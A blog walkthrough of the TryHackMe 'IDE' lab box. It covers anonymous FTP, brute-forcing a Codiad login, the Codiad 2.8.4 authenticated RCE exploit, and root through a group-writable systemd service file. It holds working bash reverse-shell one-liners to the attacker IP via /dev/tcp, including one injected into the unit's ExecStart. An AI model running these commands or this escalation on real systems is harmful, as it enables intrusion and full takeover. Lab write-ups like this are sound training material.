TryHackMe — IDE

THM Tags: #enumeration #ftp #public_exploit#privilege_escalation

This is a free box, rated at easy on the TryHackMe scale and created by bluestorm and 403Exploit. As per the THM rules, passwords/cracked hashes/flags have been obfuscated. As usual, let’s start by enumerating with the standard commands, ping, nmap and gobuster and see where we get to.

ping

Successfully ping a service four times confirming stability of the sever.

┌──(karti㉿kali)-[~]
└─$ ping $IP -c 4
PING 10.10.93.230 (10.10.93.230) 56(84) bytes of data.
64 bytes from 10.10.93.230: icmp_seq=1 ttl=63 time=22.4 ms
64 bytes from 10.10.93.230: icmp_seq=2 ttl=63 time=25.0 ms
64 bytes from 10.10.93.230: icmp_seq=3 ttl=63 time=18.1 ms
64 bytes from 10.10.93.230: icmp_seq=4 ttl=63 time=18.2 ms
--- 10.10.93.230 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 18.138/20.941/24.962/2.902 ms

nmap

This will provide details of open ports that we can investigate.

┌──(karti㉿kali)-[~]
└─$ nmap -sCV -A $IP -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-13 17:00 GMT
Nmap scan report for 10.10.93.230
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.56.134
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_ 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.92 seconds

gobuster P80

┌──(karti㉿kali)-[~]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.93.230
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/13 17:06:28 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 277]

===============================================================
2022/03/13 17:06:37 Finished
===============================================================

gobuster P62337

┌──(karti㉿kali)-[~]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.93.230
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/13 17:06:28 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 277]

===============================================================
2022/03/13 17:06:37 Finished
===============================================================

initial summary

With four ports, 21, 22, 80 and 63227 providing ftp, ssh, apache http and Codiad 2.8.4 http, we have a number of areas to investigate.

ftp

┌──(karti㉿kali)-[~]
└─$ ftp $IP
Connected to 10.10.93.230.
220 (vsFTPd 3.0.3)
Name (10.10.93.230:karti): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||20336|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 114 4096 Jun 18 2021 .
drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..
drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||31666|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
ftp> get -
local: - remote: -
229 Entering Extended Passive Mode (|||8506|)
150 Opening BINARY mode data connection for - (151 bytes).
100% |************************************************************************| 151 41.45 KiB/s 00:00 ETA
226 Transfer complete.
151 bytes received in 00:00 (6.72 KiB/s)
ftp> exit
221 Goodbye.

So this was quite sneaky, they used a directory called ... to throw us off track. Then to make it slighly more difficult they called the file - So, let’s check out what it says using the full path cat ~/-

Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.

So two possible usernames and a default password!!

website

The P80 site is a basic Apache Ubuntu Default Page:

The P62337 is a standard login page, no doubt from the Codiad 2.8.4. Codiad is a web-based IDE framework with a small footprint and minimal requirements.

We already know two usernames John and Drac, and that John’s password has been reset to the default. With that I used OWSAP ZAP to brute force with a small number of passwords.

zap

Opening up zap and using the built in browser, I quickly opened up the logon page and hit enter. This request and response was recorded and became part of the brute force process, using the fuzz option. I entered John as the username and selected the seclist best15.txt password list. I then started the fuzzer:

This then gave me a list of attempts with John and the password text file. Filtering on the response, we notice a distinct size difference.

This indicates the correct password.

codiad

Having now logged in with John and the correct password, we get the Codiad front end.

exploits

So what now? We can search for exploits now we know the actual software and user:password details.

I did look at a few, with the .txt file as the first, but following the instructions, the file format structure was different. In the end I went for the WangYihang exploit:

# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated)
# Discovery by: WangYihang
# Vendor Homepage: http://codiad.com/
# Software Links : https://github.com/Codiad/Codiad/releases
# Tested Version: Version: 2.8.4
# CVE: CVE-2018-14009

I copied the file and created a codiac.py using nano on my attack box. Running it gave me the options I needed to provide:

┌──(karti㉿kali)-[~]
└─$ python3 codiad.py
Usage :
python codiad.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
python codiad.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example :
python codiad.py http://localhost/ admin admin 8.8.8.8 8888 linux
python codiad.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author :
WangYihang <wangyihanger@gmail.com>

I amend the command as requested and I get a question:

──(karti㉿kali)-[~]
└─$ python codiad.py http://$IP:62337/ john ***** 10.11.56.134 4444 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/10.11.56.134/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n]

Once I confirm with a yes, I get the following:

[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...

This then gets me a shell on the 4445 netcat session:

┌──(karti㉿kali)-[~]
└─$ nc -nlvp 4445 1 ⨯
listening on [any] 4445 ...
connect to [10.11.56.134] from (UNKNOWN) [10.10.93.230] 39776
bash: cannot set terminal process group (930): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ide:/var/www/html/codiad/components/filemanager$

Now we can start to enumerate further;

www-data@ide:/var/www/html/codiad/components/filemanager$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ide:/var/www/html/codiad/components/filemanager$ pwd
pwd
/var/www/html/codiad/components/filemanager
www-data@ide:/var/www/html/codiad/components/filemanager$
www-data@ide:/var/www/html/codiad/components/filemanager$ ls /home
ls /home
drac
www-data@ide:/var/www/html/codiad/components/filemanager$ cd /home/drac
cd /home/drac
www-data@ide:/home/drac$ ls -la
ls -la
total 52
drwxr-xr-x 6 drac drac 4096 Aug 4 2021 .
drwxr-xr-x 3 root root 4096 Jun 17 2021 ..
-rw------- 1 drac drac 49 Jun 18 2021 .Xauthority
-rw-r--r-- 1 drac drac 36 Jul 11 2021 .bash_history
-rw-r--r-- 1 drac drac 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 drac drac 3787 Jul 11 2021 .bashrc
drwx------ 4 drac drac 4096 Jun 18 2021 .cache
drwxr-x--- 3 drac drac 4096 Jun 18 2021 .config
drwx------ 4 drac drac 4096 Jun 18 2021 .gnupg
drwx------ 3 drac drac 4096 Jun 18 2021 .local
-rw-r--r-- 1 drac drac 807 Apr 4 2018 .profile
-rw-r--r-- 1 drac drac 0 Jun 17 2021 .sudo_as_admin_successful
-rw------- 1 drac drac 557 Jun 18 2021 .xsession-errors
-r-------- 1 drac drac 33 Jun 18 2021 user.txt
www-data@ide:/home/drac$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

Right that went well!!! We manage to find that there is one user in /home, that of Drac. We can’t read his user.txt yet but we can check the other files he has in his folder.

www-data@ide:/home/drac$ cat .bash_history
cat .bash_history
mysql -u drac -p 'Th3d**********'
www-data@ide:/home/drac$

So checking his .bash_history provides us with another password. Let’s see if that gives us access to his account. So going straight into ssh we gain full access, so let’s get that user flag out the way:

┌──(karti㉿kali)-[~]
└─$ ssh drac@$IP 130 ⨯
drac@10.10.93.230's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-147-generic x86_64)69 packages can be updated.
1 update is a security update.......
.....Last login: Wed Aug 4 06:36:42 2021 from 192.168.0.105
drac@ide:~$ cat user.txt
02930d21a8e*********************

escalation

From here, let’s go straight in with a sudo -l and see what it brings:

drac@ide:~$ sudo -l
[sudo] password for drac:
Matching Defaults entries for drac on ide:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart
drac@ide:~$

So having a quick look, we can only restart vsftpd so a quick search for services and vsftpd on GTFOBINS doesn’t highlight any quick wins. So how do we manage these services?

A quick Google search provides us with some information on how services are managed:

  • In systemd, you manage sevices with systemctl command.
  • In init, you manage service with service command.

A further search on how systemd manages these services directly and we find:

Systemctl is a Linux command-line utility used to control and manage systemd and services. You can think of Systemctl as a control interface for Systemd init service, allowing you to communicate with systemd and perform operations. Systemctl is a successor of Init

itfoss provides an interesting article in how it works with examples. So that being the case, let’s see what we can do. First let’s see if it is running with a status check:

drac@ide:~$ systemctl status vsftpd
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/lib/systemd/system/vsftpd.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2022-03-13 16:59:38 UTC; 2h 15min ago
Process: 780 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, status=0/SUCCESS)
Main PID: 814 (vsftpd)
Tasks: 1 (limit: 1103)
CGroup: /system.slice/vsftpd.service
└─814 /usr/sbin/vsftpd /etc/vsftpd.conf
Warning: Journal has been rotated since unit was started. Log output is incomplete or unavailable.

So from this we can see it is active and links to a number of files:

  • /usr/sbin/vsftpd
  • /etc/vsftpd.conf
  • /lib/systemd/system/vsftpd.service

Checking out the permissions on these files we can see that one is writeable to group drac:

drac@ide:~$ ls -l /usr/sbin/vsftpd
-rwxr-xr-x 1 root root 168200 Feb 5 2018 /usr/sbin/vsftpd
drac@ide:~$ ls -l /etc/vsftpd.conf
-rw-r--r-- 1 root root 5851 Jun 18 2021 /etc/vsftpd.conf
drac@ide:~$ ls -l /lib/systemd/system/vsftpd.service
-rw-rw-r-- 1 root drac 248 Aug 4 2021 /lib/systemd/system/vsftpd.service

Checking the one we can actuallly amend, we see that as part of it’s service, it uses ExecStart.

drac@ide:~$ cat /lib/systemd/system/vsftpd.service
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target

So remembering that we can restart the service as sudo, anything that is after the ExecStart will run with root privileges. Using nano we change the file with a bash one line reverse shell.

[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.11.56.134/9999 0>&1'
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target

Priot to this running I set up a netcat session, expecting to pick up root shell.

┌──(karti㉿kali)-[~]
└─$ nc -nlvp 9999
listening on [any] 9999 ...

So running the command:

sudo /usr/sbin/service vsftpd restart

Actually gave warning to reload units. So it appears that when you amend the files, they need a reload:

Run 'systemctl daemon-reload' to reload units.

Once I did this, obviously providing the passwords for Drac when requested, and finally running my sudo command, the netcat session sprung to life.

connect to [10.11.56.134] from (UNKNOWN) [10.10.93.230] 39176
bash: cannot set terminal process group (3728): Inappropriate ioctl for device
bash: no job control in this shell
root@ide:/# cat /root/root.txt
cat /root/root.txt
ce258cb16f4***************************
root@ide:/#

And with that, straight to the flag and a cup of tea!!

summary

I really enjoyed this challenge, especailly the work around the systemd and as long as my old memory holds up, I’ll be able to use those skills on new boxes.

--

--

--

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

INTERNET OF THINGS

Be part of the biggest #Crypto event of the year

Response to Targeted Intrusions from Adaptive Threats

Overview of ECOS platform

Facebook forced me to use a password manager

How to Securely Send Finance Information in a Remote World

How to set up a Bynet Wallet?

What is Samsung Knox? [Answered]

What is Samsung Knox? [Answered]

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
James Pearson

James Pearson

20 + years in an IT environment, working for companies such as Synstar, HP, DXC and Capgemini in a number of different service areas. Now a cyber CTF addict.

More from Medium

BountyHunter WalkThrough — HackTheBox

TryHackMe Osquery Walk-Through

CTFSGCTF 2022 Write-ups

TryHackMe ‘Ignite’ Room Walkthrough